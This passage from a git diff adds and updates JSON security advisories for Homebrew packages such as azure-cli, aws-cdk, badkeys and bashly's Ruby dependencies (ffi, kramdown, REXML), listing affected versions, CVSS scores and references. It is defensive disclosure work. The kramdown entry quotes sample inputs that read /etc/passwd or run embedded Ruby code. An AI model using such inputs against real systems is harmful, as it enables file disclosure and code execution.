+++ b/advisories/BREW-aws-cdk-CVE-2025-2598.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-cdk-CVE-2025-2598", "published": "2026-08-13T16:36:30Z", - "modified": "2026-08-19T08:40:15Z", + "modified": "2026-08-22T08:39:46Z", "upstream": [ "CVE-2025-2598", "GHSA-v63m-x9r9-8gqp" @@ -43,15 +43,15 @@ "strategy": "git", "ecosystem": "GIT", "name": "https://github.com/aws/aws-cdk", - "subject_version": "2.1137.0", + "subject_version": "2.1138.0", "key": "https://github.com/aws/aws-cdk" }, { "strategy": "registry", "ecosystem": "npm", "name": "aws-cdk", - "subject_version": "2.1137.0", - "key": "pkg:npm/aws-cdk@2.1137.0" + "subject_version": "2.1138.0", + "key": "pkg:npm/aws-cdk@2.1138.0" } ] }, diff --git a/advisories/BREW-azure-cli-CVE-2026-13346.json b/advisories/BREW-azure-cli-CVE-2026-13346.json new file mode 100644 index 00000000000..fc9611a5776 --- /dev/null +++ b/advisories/BREW-azure-cli-CVE-2026-13346.json @@ -0,0 +1,75 @@ +{ + "schema_version": "1.7.3", + "id": "BREW-azure-cli-CVE-2026-13346", + "published": "2026-08-22T08:40:17Z", + "modified": "2026-08-22T08:40:17Z", + "upstream": [ + "PYSEC-2026-3721", + "CVE-2026-13346" + ], + "affected": [ + { + "package": { + "ecosystem": "Homebrew", + "name": "azure-cli", + "purl": "pkg:brew/azure-cli" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "2.89.1" + } + ] + } + ], + "ecosystem_specific": { + "fix": "bump", + "range_state": "fixed", + "upstream_fixed_in": "26.2", + "resource": "pip", + "resource_purl": "pkg:pypi/pip@26.2.1" + } + } + ], + "database_specific": { + "source": "matched", + "strategy": "registry", + "confidence": "high", + "upstream_evidence": [ + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "pip", + "subject_version": "26.2.1", + "key": "pkg:pypi/pip@26.2.1", + "resource": "pip" + } + ] + }, + "details": "pip would incorrectly handle doubly-encoded package URLs from indexes allowing for files to be installed to arbitrary locations on disk even when installing wheels.\n\n\n\n\nThis vulnerability requires downloading or installing a package from a malicious package index to succeed, malicious packages alone are not able to exploit this vulnerability. Note that this vulnerability only materially impacts users running `pip download` with the `--only-binary` option as installing source distributions from an untrusted index is already an unsafe operation that executes code during install time.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N" + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "http://www.openwall.com/lists/oss-security/2026/07/29/7" + }, + { + "type": "ADVISORY", + "url": "https://mail.python.org/archives/list/security-announce@python.org/thread/L2BNQGGVQCEV7DROOORQ7WFKKFF2OOQX/" + }, + { + "type": "FIX", + "url": "https://github.com/pypa/pip/pull/14110" + } + ] +} diff --git a/advisories/BREW-badkeys-CVE-2026-21439.json b/advisories/BREW-badkeys-CVE-2026-21439.json index ce654c656ad..90d1c1ca2c5 100644 --- a/advisories/BREW-badkeys-CVE-2026-21439.json +++ b/advisories/BREW-badkeys-CVE-2026-21439.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-badkeys-CVE-2026-21439", "published": "2026-08-13T16:37:04Z", - "modified": "2026-08-13T16:37:04Z", + "modified": "2026-08-22T08:40:18Z", "upstream": [ "CVE-2026-21439", "GHSA-wjpc-4f29-83h3", @@ -44,22 +44,22 @@ "strategy": "git", "ecosystem": "GIT", "name": "https://github.com/badkeys/badkeys", - "subject_version": "0.0.19", + "subject_version": "0.0.20", "key": "https://github.com/badkeys/badkeys" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "badkeys", - "subject_version": "0.0.19", - "key": "pkg:pypi/badkeys@0.0.19" + "subject_version": "0.0.20", + "key": "pkg:pypi/badkeys@0.0.20" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "badkeys", - "subject_version": "0.0.19", - "key": "pkg:pypi/badkeys@0.0.19" + "subject_version": "0.0.20", + "key": "pkg:pypi/badkeys@0.0.20" } ] }, diff --git a/advisories/BREW-bashly-CVE-2018-1000201.json b/advisories/BREW-bashly-CVE-2018-1000201.json new file mode 100644 index 00000000000..58a4afdfab5 --- /dev/null +++ b/advisories/BREW-bashly-CVE-2018-1000201.json @@ -0,0 +1,88 @@ +{ + "schema_version": "1.7.3", + "id": "BREW-bashly-CVE-2018-1000201", + "published": "2026-08-22T08:40:22Z", + "modified": "2026-08-22T08:40:22Z", + "upstream": [ + "GHSA-2gw2-8q9w-cw8p", + "CVE-2018-1000201" + ], + "affected": [ + { + "package": { + "ecosystem": "Homebrew", + "name": "bashly", + "purl": "pkg:brew/bashly" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "1.4.0" + } + ] + } + ], + "ecosystem_specific": { + "fix": "bump", + "range_state": "fixed", + "upstream_fixed_in": "1.9.24", + "resource": "ffi", + "resource_purl": "pkg:gem/ffi@1.17.4" + } + } + ], + "database_specific": { + "source": "matched", + "strategy": "registry", + "confidence": "high", + "upstream_evidence": [ + { + "strategy": "registry", + "ecosystem": "RubyGems", + "name": "ffi", + "subject_version": "1.17.4", + "key": "pkg:gem/ffi@1.17.4", + "resource": "ffi" + } + ] + }, + "summary": "Ruby-ffi has a DLL loading issue ", + "details": "ruby-ffi version 1.9.23 and earlier has a DLL loading issue which can be hijacked on Windows OS, when a Symbol is used as DLL name instead of a String This vulnerability appears to have been fixed in v1.9.24 and later.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-1000201" + }, + { + "type": "WEB", + "url": "https://github.com/ffi/ffi/commit/09e0c6076466b4383da7fa4e13f714311109945a" + }, + { + "type": "WEB", + "url": "https://github.com/ffi/ffi/commit/e0fe486df0e117ed67b0282b6ada04b7214ca05c" + }, + { + "type": "PACKAGE", + "url": "https://github.com/ffi/ffi" + }, + { + "type": "WEB", + "url": "https://github.com/ffi/ffi/releases/tag/1.9.24" + }, + { + "type": "WEB", + "url": "https://github.com/rubysec/ruby-advisory-db/blob/master/gems/ffi/CVE-2018-1000201.yml" + } + ] +} diff --git a/advisories/BREW-bashly-CVE-2020-14001.json b/advisories/BREW-bashly-CVE-2020-14001.json new file mode 100644 index 00000000000..ab64a1de7b2 --- /dev/null +++ b/advisories/BREW-bashly-CVE-2020-14001.json @@ -0,0 +1,128 @@ +{ + "schema_version": "1.7.3", + "id": "BREW-bashly-CVE-2020-14001", + "published": "2026-08-22T08:40:22Z", + "modified": "2026-08-22T08:40:22Z", + "upstream": [ + "GHSA-mqm2-cgpr-p4m6", + "CVE-2020-14001" + ], + "affected": [ + { + "package": { + "ecosystem": "Homebrew", + "name": "bashly", + "purl": "pkg:brew/bashly" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "1.4.0" + } + ] + } + ], + "ecosystem_specific": { + "fix": "bump", + "range_state": "fixed", + "upstream_fixed_in": "2.3.0", + "resource": "kramdown", + "resource_purl": "pkg:gem/kramdown@2.5.2" + } + } + ], + "database_specific": { + "source": "matched", + "strategy": "registry", + "confidence": "high", + "upstream_evidence": [ + { + "strategy": "registry", + "ecosystem": "RubyGems", + "name": "kramdown", + "subject_version": "2.5.2", + "key": "pkg:gem/kramdown@2.5.2", + "resource": "kramdown" + } + ] + }, + "summary": "Unintended read access in kramdown gem", + "details": "The kramdown gem before 2.3.0 for Ruby processes the template option inside Kramdown documents by default, which allows unintended read access (such as template=\"/etc/passwd\") or unintended embedded Ruby code execution (such as a string that begins with template=\"string://<%= `). NOTE: kramdown is used in Jekyll, GitLab Pages, GitHub Pages, and Thredded Forum.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-14001" + }, + { + "type": "WEB", + "url": "https://github.com/gettalong/kramdown/commit/1b8fd33c3120bfc6e5164b449e2c2fc9c9306fde" + }, + { + "type": "ADVISORY", + "url": "https://github.com/advisories/GHSA-mqm2-cgpr-p4m6" + }, + { + "type": "PACKAGE", + "url": "https://github.com/gettalong/kramdown" + }, + { + "type": "WEB", + "url": "https://github.com/gettalong/kramdown/compare/REL_2_2_1...REL_2_3_0" + }, + { + "type": "WEB", + "url": "https://github.com/rubysec/ruby-advisory-db/blob/master/gems/kramdown/CVE-2020-14001.yml" + }, + { + "type": "WEB", + "url": "https://kramdown.gettalong.org" + }, + { + "type": "WEB", + "url": "https://kramdown.gettalong.org/news.html" + }, + { + "type": "WEB", + "url": "https://lists.apache.org/thread.html/r96df7899fbb456fe2705882f710a0c8e8614b573fbffd8d12e3f54d2@%3Cnotifications.fluo.apache.org%3E" + }, + { + "type": "WEB", + "url": "https://lists.debian.org/debian-lts-announce/2020/08/msg00014.html" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ENMMGKHRQIZ3QKGOMBBBGB6B4LB5I7NQ" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KBLTGBYU7NKOUOHDKVCU4GFZMGA6BP4L" + }, + { + "type": "WEB", + "url": "https://rubygems.org/gems/kramdown" + }, + { + "type": "WEB", + "url": "https://security.netapp.com/advisory/ntap-20200731-0004" + }, + { + "type": "WEB", + "url": "https://usn.ubuntu.com/4562-1" + }, + { + "type": "WEB", + "url": "https://www.debian.org/security/2020/dsa-4743" + } + ] +} diff --git a/advisories/BREW-bashly-CVE-2021-28834.json b/advisories/BREW-bashly-CVE-2021-28834.json new file mode 100644 index 00000000000..d4079a86b16 --- /dev/null +++ b/advisories/BREW-bashly-CVE-2021-28834.json @@ -0,0 +1,108 @@ +{ + "schema_version": "1.7.3", + "id": "BREW-bashly-CVE-2021-28834", + "published": "2026-08-22T08:40:22Z", + "modified": "2026-08-22T08:40:22Z", + "upstream": [ + "GHSA-52p9-v744-mwjj", + "CVE-2021-28834" + ], + "affected": [ + { + "package": { + "ecosystem": "Homebrew", + "name": "bashly", + "purl": "pkg:brew/bashly" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "1.4.0" + } + ] + } + ], + "ecosystem_specific": { + "fix": "bump", + "range_state": "fixed", + "upstream_fixed_in": "2.3.1", + "resource": "kramdown", + "resource_purl": "pkg:gem/kramdown@2.5.2" + } + } + ], + "database_specific": { + "source": "matched", + "strategy": "registry", + "confidence": "high", + "upstream_evidence": [ + { + "strategy": "registry", + "ecosystem": "RubyGems", + "name": "kramdown", + "subject_version": "2.5.2", + "key": "pkg:gem/kramdown@2.5.2", + "resource": "kramdown" + } + ] + }, + "summary": "Remote code execution in Kramdown", + "details": "Kramdown before 2.3.1 does not restrict Rouge formatters to the Rouge::Formatters namespace, and thus arbitrary classes can be instantiated.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-28834" + }, + { + "type": "WEB", + "url": "https://github.com/gettalong/kramdown/pull/708" + }, + { + "type": "WEB", + "url": "https://github.com/stanhu/kramdown/commit/d6a1cbcb2caa2f8a70927f176070d126b2422760" + }, + { + "type": "WEB", + "url": "https://github.com/stanhu/kramdown/commit/ff0218aefcf00cd5a389e17e075d36cd46d011e2" + }, + { + "type": "WEB", + "url": "https://about.gitlab.com/releases/2021/03/17/security-release-gitlab-13-9-4-released/#remote-code-execution-via-unsafe-user-controlled-markdown-rendering-options" + }, + { + "type": "WEB", + "url": "https://github.com/gettalong/kramdown/compare/REL_2_3_0...REL_2_3_1" + }, + { + "type": "WEB", + "url": "https://gitlab.com/gitlab-org/gitlab/-/commit/179329b5c3c118924fb242dc449d06b4ed6ccb66" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/NJCJVYHPY6LNUFM6LYZIAUIYOMVT5QGV" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/S3BBLUIDCUUR3NEE4NJLOCCAV3ALQ3O6" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SYOLQKFL6IJCQLBXV34Z4TI4O54GESPR" + }, + { + "type": "WEB", + "url": "https://www.debian.org/security/2021/dsa-4890" + } + ] +} diff --git a/advisories/BREW-bashly-CVE-2021-28965.json b/advisories/BREW-bashly-CVE-2021-28965.json new file mode 100644 index 00000000000..c61fbc303e6 --- /dev/null +++ b/advisories/BREW-bashly-CVE-2021-28965.json @@ -0,0 +1,126 @@ +{ + "schema_version": "1.7.3", + "id": "BREW-bashly-CVE-2021-28965", + "published": "2026-08-22T08:40:22Z", + "modified": "2026-08-22T08:40:22Z", + "upstream": [ + "GHSA-8cr8-4vfw-mr7h", + "BIT-ruby-2021-28965", + "BIT-ruby-min-2021-28965", + "CVE-2021-28965" + ], + "affected": [ + { + "package": { + "ecosystem": "Homebrew", + "name": "bashly", + "purl": "pkg:brew/bashly" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "1.4.0" + } + ] + } + ], + "ecosystem_specific": { + "fix": "bump", + "range_state": "fixed", + "upstream_fixed_in": "3.2.5", + "resource": "rexml", + "resource_purl": "pkg:gem/rexml@3.4.4" + } + } + ], + "database_specific": { + "source": "matched", + "strategy": "registry", + "confidence": "high", + "upstream_evidence": [ + { + "strategy": "registry", + "ecosystem": "RubyGems", + "name": "rexml", + "subject_version": "3.4.4", + "key": "pkg:gem/rexml@3.4.4", + "resource": "rexml" + } + ] + }, + "summary": "REXML round-trip instability", + "details": "The REXML gem before 3.2.5 in Ruby before 2.6.7, 2.7.x before 2.7.3, and 3.x before 3.0.1 does not properly address XML round-trip issues. An incorrect document can be produced after parsing and serializing. ", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N" + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-28965" + }, + { + "type": "WEB", + "url": "https://github.com/ruby/rexml/commit/2fe62e29094d95921d7e19abbd2e26b23d78dc5b" + }, + { + "type": "WEB", + "url": "https://github.com/ruby/rexml/commit/3c137eb119550874b2b3e27d12b733ca67033377" + }, + { + "type": "WEB", + "url": "https://github.com/ruby/rexml/commit/6a250d2cd1194c2be72becbdd9c3e770aa16e752" + }, + { + "type": "WEB", + "url": "https://github.com/ruby/rexml/commit/9b311e59ae05749e082eb6bbefa1cb620d1a786e" + }, + { + "type": "WEB", + "url": "https://github.com/ruby/rexml/commit/a659c63e37414506dfb0d4655e031bb7a2e73fc8" + }, + { + "type": "WEB", + "url": "https://github.com/ruby/rexml/commit/f7bab8937513b1403cea5aff874cbf32fd5e8551" + }, + { + "type": "WEB", + "url": "https://github.com/ruby/rexml/commit/f9d88e4948b4a43294c25dc0edb16815bd9d8618" + }, + { + "type": "WEB", + "url": "https://hackerone.com/reports/1104077" + }, + { + "type": "PACKAGE", + "url": "https://github.com/ruby/rexml" + }, + { + "type": "WEB", + "url": "https://github.com/rubysec/ruby-advisory-db/blob/master/gems/rexml/CVE-2021-28965.yml" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/WTVFTLFVCSUE5CXHINJEUCKSHU4SWDMT" + }, + { + "type": "WEB", + "url": "https://rubygems.org/gems/rexml" + }, + { + "type": "WEB", + "url": "https://security.netapp.com/advisory/ntap-20210528-0003" + }, + { + "type": "WEB", + "url": "https://www.ruby-lang.org/en/news/2021/04/05/xml-round-trip-vulnerability-in-rexml-cve-2021-28965" + } + ] +} diff --git a/advisories/BREW-bashly-CVE-2024-35176.json b/advisories/BREW-bashly-CVE-2024-35176.json new file mode 100644 index 00000000000..abb0e4de586 --- /dev/null +++ b/advisories/BREW-bashly-CVE-2024-35176.json @@ -0,0 +1,92 @@ +{ + "schema_version": "1.7.3", + "id": "BREW-bashly-CVE-2024-35176", + "published": "2026-08-22T08:40:22Z", + "modified": "2026-08-22T08:40:22Z", + "upstream": [ + "GHSA-vg3r-rm7w-2xgh", + "CVE-2024-35176" + ], + "affected": [ + { + "package": { + "ecosystem": "Homebrew", + "name": "bashly", + "purl": "pkg:brew/bashly" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "1.4.0" + } + ] + } + ], + "ecosystem_specific": { + "fix": "bump", + "range_state": "fixed", + "upstream_fixed_in": "3.2.7", + "resource": "rexml", + "resource_purl": "pkg:gem/rexml@3.4.4" + } + } + ], + "database_specific": { + "source": "matched", + "strategy": "registry", + "confidence": "high", + "upstream_evidence": [ + { + "strategy": "registry", + "ecosystem": "RubyGems", + "name": "rexml", + "subject_version": "3.4.4", + "key": "pkg:gem/rexml@3.4.4", + "resource": "rexml" + } + ] + }, + "summary": "REXML contains a denial of service vulnerability", + "details": "### Impact\n\nThe REXML gem before 3.2.6 has a DoS vulnerability when it parses an XML that has many `>`s in an attribute value.\n\nIf you need to parse untrusted XMLs, you may be impacted to this vulnerability.\n\n### Patches\n\nThe REXML gem 3.2.7 or later include the patch to fix this vulnerability.\n\n### Workarounds\n\nDon't parse untrusted XMLs.\n\n### References\n\n* https://www.ruby-lang.org/en/news/2024/05/16/dos-rexml-cve-2024-35176/", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/ruby/rexml/security/advisories/GHSA-vg3r-rm7w-2xgh" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-35176" + }, + { + "type": "WEB", + "url": "https://github.com/ruby/rexml/commit/4325835f92f3f142ebd91a3fdba4e1f1ab7f1cfb" + }, + { + "type": "PACKAGE", + "url": "https://github.com/ruby/rexml" + }, + { + "type": "WEB", + "url": "https://lists.debian.org/debian-lts-announce/2025/01/msg00011.html" + }, + { + "type": "WEB", + "url": "https://security.netapp.com/advisory/ntap-20250306-0001" + }, + { + "type": "WEB", + "url": "https://www.ruby-lang.org/en/news/2024/05/16/dos-rexml-cve-2024-35176" + } + ] +} diff --git a/advisories/BREW-bashly-CVE-2024-39908.json b/advisories/BREW-bashly-CVE-2024-39908.json new file mode 100644 index 00000000000..706fd9cfec8 --- /dev/null +++ b/advisories/BREW-bashly-CVE-2024-39908.json @@ -0,0 +1,100 @@ +{ + "schema_version": "1.7.3", + "id": "BREW-bashly-CVE-2024-39908", + "published": "2026-08-22T08:40:22Z", + "modified": "2026-08-22T08:40:22Z", + "upstream": [ + "GHSA-4xqq-m2hx-25v8", + "CVE-2024-39908" + ], + "affected": [ + { + "package": { + "ecosystem": "Homebrew", + "name": "bashly", + "purl": "pkg:brew/bashly" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "1.4.0" + } + ] + } + ], + "ecosystem_specific": { + "fix": "bump", + "range_state": "fixed", + "upstream_fixed_in": "3.3.2", + "resource": "rexml", + "resource_purl": "pkg:gem/rexml@3.4.4" + } + } + ], + "database_specific": { + "source": "matched", + "strategy": "registry", + "confidence": "high", + "upstream_evidence": [ + { + "strategy": "registry", + "ecosystem": "RubyGems", + "name": "rexml", + "subject_version": "3.4.4", + "key": "pkg:gem/rexml@3.4.4", + "resource": "rexml" + } + ] + }, + "summary": "REXML denial of service vulnerability", + "details": "### Impact\n\nThe REXML gem before 3.3.1 has some DoS vulnerabilities when it parses an XML that has many specific characters such as `<`, `0` and `%>`.\n\nIf you need to parse untrusted XMLs, you may be impacted to these vulnerabilities.\n\n### Patches\n\nThe REXML gem 3.3.2 or later include the patches to fix these vulnerabilities.\n\n### Workarounds\n\nDon't parse untrusted XMLs.\n\n### References\n\n* https://github.com/ruby/rexml/security/advisories/GHSA-vg3r-rm7w-2xgh : This is a similar vulnerability\n* https://www.ruby-lang.org/en/news/2024/07/16/dos-rexml-cve-2024-39908/", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N" + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/ruby/rexml/security/advisories/GHSA-4xqq-m2hx-25v8" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-39908" + }, + { + "type": "PACKAGE", + "url": "https://github.com/ruby/rexml" + }, + { + "type": "WEB", + "url": "https://github.com/ruby/rexml/releases/tag/v3.3.2" + }, + { + "type": "WEB", + "url": "https://github.com/rubysec/ruby-advisory-db/blob/master/gems/rexml/CVE-2024-39908.yml" + }, + { + "type": "WEB", + "url": "https://lists.debian.org/debian-lts-announce/2025/01/msg00011.html" + }, + { + "type": "WEB", + "url": "https://security.netapp.com/advisory/ntap-20250117-0008" + }, + { + "type": "WEB", + "url": "https://www.ruby-lang.org/en/news/2024/07/16/dos-rexml-cve-2024-39908" + } + ] +} diff --git a/advisories/BREW-bashly-CVE-2024-41123.json b/advisories/BREW-bashly-CVE-2024-41123.json new file mode 100644 index 00000000000..3774cfb2ee7 --- /dev/null +++ b/advisories/BREW-bashly-CVE-2024-41123.json @@ -0,0 +1,104 @@ +{ + "schema_version": "1.7.3", + "id": "BREW-bashly-CVE-2024-41123", + "published": "2026-08-22T08:40:22Z", + "modified": "2026-08-22T08:40:22Z", + "upstream": [ + "GHSA-r55c-59qm-vjw6", + "CVE-2024-41123" + ], + "affected": [ + { + "package": { + "ecosystem": "Homebrew", + "name": "bashly", + "purl": "pkg:brew/bashly" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "1.4.0" + } + ] + } + ], + "ecosystem_specific": { + "fix": "bump", + "range_state": "fixed", + "upstream_fixed_in": "3.3.3", + "resource": "rexml", + "resource_purl": "pkg:gem/rexml@3.4.4" + } + } + ], + "database_specific": { + "source": "matched", + "strategy": "registry", + "confidence": "high", + "upstream_evidence": [ + { + "strategy": "registry", + "ecosystem": "RubyGems", + "name": "rexml", + "subject_version": "3.4.4", + "key": "pkg:gem/rexml@3.4.4", + "resource": "rexml" + } + ] + }, + "summary": "REXML DoS vulnerability", + "details": "### Impact\n\nThe REXML gem before 3.3.2 has some DoS vulnerabilities when it parses an XML that has many specific characters such as whitespace character, `>]` and `]>`.\n\nIf you need to parse untrusted XMLs, you may be impacted to these vulnerabilities.\n\n### Patches\n\nThe REXML gem 3.3.3 or later include the patches to fix these vulnerabilities.\n\n### Workarounds\n\nDon't parse untrusted XMLs.\n\n### References\n\n* https://github.com/ruby/rexml/security/advisories/GHSA-vg3r-rm7w-2xgh : This is a similar vulnerability\n* https://github.com/ruby/rexml/security/advisories/GHSA-4xqq-m2hx-25v8 : This is a similar vulnerability\n* https://www.ruby-lang.org/en/news/2024/08/01/dos-rexml-cve-2024-41123/: An announce on www.ruby-lang.org", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N" + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/ruby/rexml/security/advisories/GHSA-4xqq-m2hx-25v8" + }, + { + "type": "WEB", + "url": "https://github.com/ruby/rexml/security/advisories/GHSA-r55c-59qm-vjw6" + }, + { + "type": "WEB", + "url": "https://github.com/ruby/rexml/security/advisories/GHSA-vg3r-rm7w-2xgh" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-41123" + }, + { + "type": "PACKAGE", + "url": "https://github.com/ruby/rexml" + }, + { + "type": "WEB", + "url": "https://github.com/rubysec/ruby-advisory-db/blob/master/gems/rexml/CVE-2024-41123.yml" + }, + { + "type": "WEB", + "url": "https://lists.debian.org/debian-lts-announce/2025/01/msg00011.html" + }, + { + "type": "WEB", + "url": "https://security.netapp.com/advisory/ntap-20241227-0005" + }, + { + "type": "WEB", + "url": "https://www.ruby-lang.org/en/news/2024/08/01/dos-rexml-cve-2024-41123" + } + ] +} diff --git a/advisories/BREW-bashly-CVE-2024-41946.json b/advisories/BREW-bashly-CVE-2024-41946.json new file mode 100644 index 00000000000..e058acc50ee --- /dev/null +++ b/advisories/BREW-bashly-CVE-2024-41946.json @@ -0,0 +1,104 @@ +{ + "schema_version": "1.7.3", + "id": "BREW-bashly-CVE-2024-41946", + "published": "2026-08-22T08:40:22Z", + "modified": "2026-08-22T08:40:22Z", + "upstream": [ + "GHSA-5866-49gr-22v4", + "CVE-2024-41946" + ], + "affected": [ + { + "package": { + "ecosystem": "Homebrew", + "name": "bashly", + "purl": "pkg:brew/bashly" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "1.4.0" + } + ] + } + ], + "ecosystem_specific": { + "fix": "bump", + "range_state": "fixed", + "upstream_fixed_in": "3.3.3", + "resource": "rexml", + "resource_purl": "pkg:gem/rexml@3.4.4" + } + } + ], + "database_specific": { + "source": "matched", + "strategy": "registry", + "confidence": "high", + "upstream_evidence": [ + { + "strategy": "registry", + "ecosystem": "RubyGems", + "name": "rexml", + "subject_version": "3.4.4", + "key": "pkg:gem/rexml@3.4.4", + "resource": "rexml" + } + ] + }, + "summary": "REXML DoS vulnerability", + "details": "### Impact\n\nThe REXML gem before 3.3.2 has a DoS vulnerability when it parses an XML that has many entity expansions with SAX2 or pull parser API.\n\nIf you need to parse untrusted XMLs with SAX2 or pull parser API, you may be impacted to this vulnerability.\n\n### Patches\n\nThe REXML gem 3.3.3 or later include the patch to fix the vulnerability.\n\n### Workarounds\n\nDon't parse untrusted XMLs with SAX2 or pull parser API.\n\n### References\n\n* https://www.ruby-lang.org/en/news/2008/08/23/dos-vulnerability-in-rexml/ : This is a similar vulnerability\n* https://www.ruby-lang.org/en/news/2024/08/01/dos-rexml-cve-2024-41946/: An announce on www.ruby-lang.org", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N" + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/ruby/rexml/security/advisories/GHSA-5866-49gr-22v4" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-41946" + }, + { + "type": "WEB", + "url": "https://github.com/ruby/rexml/commit/033d1909a8f259d5a7c53681bcaf14f13bcf0368" + }, + { + "type": "PACKAGE", + "url": "https://github.com/ruby/rexml" + }, + { + "type": "WEB", + "url": "https://github.com/rubysec/ruby-advisory-db/blob/master/gems/rexml/CVE-2024-41946.yml" + }, + { + "type": "WEB", + "url": "https://lists.debian.org/debian-lts-announce/2025/01/msg00011.html" + }, + { + "type": "WEB", + "url": "https://security.netapp.com/advisory/ntap-20250117-0007" + }, + { + "type": "WEB", + "url": "https://www.ruby-lang.org/en/news/2008/08/23/dos-vulnerability-in-rexml" + }, + { + "type": "WEB", + "url": "https://www.ruby-lang.org/en/news/2024/08/01/dos-rexml-cve-2024-41946" + } + ] +} diff --git a/advisories/BREW-bashly-CVE-2024-43398.json b/advisories/BREW-bashly-CVE-2024-43398.json new file mode 100644 index 00000000000..f321d420358 --- /dev/null +++ b/advisories/BREW-bashly-CVE-2024-43398.json @@ -0,0 +1,104 @@ +{ + "schema_version": "1.7.3", + "id": "BREW-bashly-CVE-2024-43398", + "published": "2026-08-22T08:40:22Z", + "modified": "2026-08-22T08:40:22Z", + "upstream": [ + "GHSA-vmwr-mc7x-5vc3", + "CVE-2024-43398" + ], + "affected": [ + { + "package": { + "ecosystem": "Homebrew", + "name": "bashly", + "purl": "pkg:brew/bashly" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "1.4.0" + } + ] + } + ], + "ecosystem_specific": { + "fix": "bump", + "range_state": "fixed", + "upstream_fixed_in": "3.3.6", + "resource": "rexml", + "resource_purl": "pkg:gem/rexml@3.4.4" + } + } + ], + "database_specific": { + "source": "matched", + "strategy": "registry", + "confidence": "high", + "upstream_evidence": [ + { + "strategy": "registry", + "ecosystem": "RubyGems", + "name": "rexml", + "subject_version": "3.4.4", + "key": "pkg:gem/rexml@3.4.4", + "resource": "rexml" + } + ] + }, + "summary": "REXML denial of service vulnerability", + "details": "### Impact\n\nThe REXML gem before 3.3.6 has a DoS vulnerability when it parses an XML that has many deep elements that have same local name attributes.\n\nIf you need to parse untrusted XMLs with tree parser API like `REXML::Document.new`, you may be impacted to this 